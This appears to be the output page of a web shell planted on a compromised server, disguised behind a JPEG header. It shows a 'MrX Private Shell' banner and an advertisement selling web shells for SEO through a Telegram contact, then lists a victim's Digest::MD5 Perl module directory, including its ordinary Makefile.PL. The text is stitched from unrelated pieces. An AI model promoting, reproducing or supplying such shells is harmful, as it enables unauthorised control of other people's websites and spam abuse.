����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!perl -w
use strict;
use warnings;
use Config qw(%Config);
use ExtUtils::MakeMaker;
my @extra;
push(@extra, INSTALLDIRS => 'perl') if $] >= 5.008 && $] < 5.012;
if ($^O eq 'VMS') {
if (defined($Config{ccname})) {
if (grep(/VMS_VAX/, @INC) && ($Config{ccname} eq 'DEC')) {
# VAX compiler optimizer even as late as v6.4 gets stuck
push(@extra, OPTIMIZE => "/Optimize=(NODISJOINT)");
}
}
}
WriteMakefile(
'NAME' => 'Digest::MD5',
'VERSION_FROM' => 'MD5.pm',
'ABSTRACT' => 'Perl interface to the MD-5 algorithm',
'AUTHOR' => 'Gisle Aas <gisle@activestate.com>',
'LICENSE' => 'perl',
'MIN_PERL_VERSION' => 5.006,
'PREREQ_PM' => {
'Digest::base' => '1.00',
'XSLoader' => 0,
},
'META_MERGE' => {
resources => {
license => 'http://dev.perl.org/licenses/',
bugtracker => 'https://github.com/Dual-Life/digest-md5/issues',
repository => 'https://github.com/dual-Life/digest-md5/',
}
},
@extra,
);
BEGIN {
# compatibility with older versions of MakeMaker
my $developer = -d ".git";
my %mm_req = (
LICENCE => 6.31,
META_MERGE => 6.45,
META_ADD => 6.45,
MIN_PERL_VERSION => 6.48,
);
undef(*WriteMakefile);
*WriteMakefile = sub {
my %arg = @_;
for (keys %mm_req) {
unless (eval { ExtUtils::MakeMaker->VERSION($mm_req{$_}) }) {
warn "$_ $@" if $developer;
delete $arg{$_};
}
}
ExtUtils::MakeMaker::WriteMakefile(%arg);
};
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bin | Folder | 0755 |
|
|
| blib | Folder | 0755 |
|
|
| hints | Folder | 0755 |
|
|
| t | Folder | 0755 |
|
|
| Changes | File | 20.39 KB | 0644 |
|
| MANIFEST | File | 894 B | 0644 |
|
| MD5.bs | File | 0 B | 0644 |
|
| MD5.c | File | 29.46 KB | 0644 |
|
| MD5.o | File | 302.93 KB | 0644 |
|
| MD5.pm | File | 10.79 KB | 0644 |
|
| MD5.xs | File | 20.87 KB | 0644 |
|
| META.json | File | 1.26 KB | 0644 |
|
| META.yml | File | 768 B | 0644 |
|
| MYMETA.json | File | 1.26 KB | 0644 |
|
| MYMETA.yml | File | 768 B | 0644 |
|
| Makefile | File | 37.11 KB | 0644 |
|
| Makefile.PL | File | 1.62 KB | 0644 |
|
| README | File | 514 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| rfc1321.txt | File | 34.4 KB | 0644 |
|
| typemap | File | 68 B | 0644 |
|